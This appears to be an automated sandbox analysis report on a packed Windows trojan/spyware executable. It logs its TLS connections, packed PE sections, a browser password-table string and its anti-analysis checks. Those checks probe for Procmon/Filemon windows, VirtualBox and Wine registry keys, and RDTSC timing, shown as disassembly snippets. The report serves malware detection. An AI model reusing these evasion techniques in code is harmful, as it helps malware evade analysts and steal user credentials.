              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49908 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D96A0A0_3_00D96A0A
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979489126175548
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2544380146.0000000005607000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2165195321.0000000005606000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2165504663.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544577650.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 2922496 > 1048576
              Source: file.exeStatic PE information: Raw size of eijsszyp is bigger than: 0x100000 < 0x29e200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W;eijsszyp:EW;xxbxeocn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;eijsszyp:EW;xxbxeocn:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2d7e89 should be: 0x2d0363
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: eijsszyp
              Source: file.exeStatic PE information: section name: xxbxeocn
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95DC6 pushad ; iretd 0_3_00D95DCA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D98CF8 pushad ; ret 0_3_00D98CF9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D95CE5 push ss; retf 0_3_00D95D1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D94785 pushfd ; retf 0_3_00D95038
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D94785 pushfd ; retf 0_3_00D95038
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D94785 pushfd ; retf 0_3_00D95038
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00D94785 pushfd ; retf 0_3_00D95038
              Source: file.exeStatic PE information: section name: entropy: 7.978490875244356

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0F77 second address: 2A0F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0CB0E1B256h 0x0000000a jns 00007F0CB0E1B256h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0F87 second address: 2A0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0F8B second address: 2A0F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0CB0E1B256h 0x0000000e jng 00007F0CB0E1B256h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0F9F second address: 2A0FB1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0CB0C50336h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0FB1 second address: 2A0FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0FB9 second address: 2A0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0CB0C5033Eh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F0CB0C50336h 0x00000013 pushad 0x00000014 jmp 00007F0CB0C50348h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29FFDE second address: 29FFFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0CB0E1B269h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A02C0 second address: 2A02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F0CB0C50344h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A0436 second address: 2A043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A36D7 second address: 2A373F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0CB0C50342h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnp 00007F0CB0C5033Ch 0x00000013 jng 00007F0CB0C50336h 0x00000019 push eax 0x0000001a jmp 00007F0CB0C5033Ah 0x0000001f pop eax 0x00000020 popad 0x00000021 nop 0x00000022 mov si, 43F0h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F0CB0C50338h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ah 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov dl, 11h 0x00000044 push B5687DAFh 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pop edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A373F second address: 2A3743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3743 second address: 2A374E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3993 second address: 2A39AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B266h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A39AD second address: 2A39B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A3AEE second address: 2A3AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0CB0E1B25Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B61EC second address: 2B61F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B61F0 second address: 2B620E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0CB0E1B264h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1F64 second address: 2C1F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1F6A second address: 2C1F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0CB0E1B268h 0x0000000e jp 00007F0CB0E1B256h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1F91 second address: 2C1F9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1F9B second address: 2C1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1FA1 second address: 2C1FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1FA5 second address: 2C1FA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1FA9 second address: 2C1FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C1FAF second address: 2C1FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C211B second address: 2C2121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2265 second address: 2C2270 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0CB0E1B256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2270 second address: 2C22DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0CB0C50341h 0x00000009 jmp 00007F0CB0C50345h 0x0000000e popad 0x0000000f jmp 00007F0CB0C50349h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F0CB0C5033Ch 0x0000001c jnc 00007F0CB0C50342h 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F0CB0C50336h 0x0000002a push edi 0x0000002b pop edi 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C22DF second address: 2C22E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C2445 second address: 2C2449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
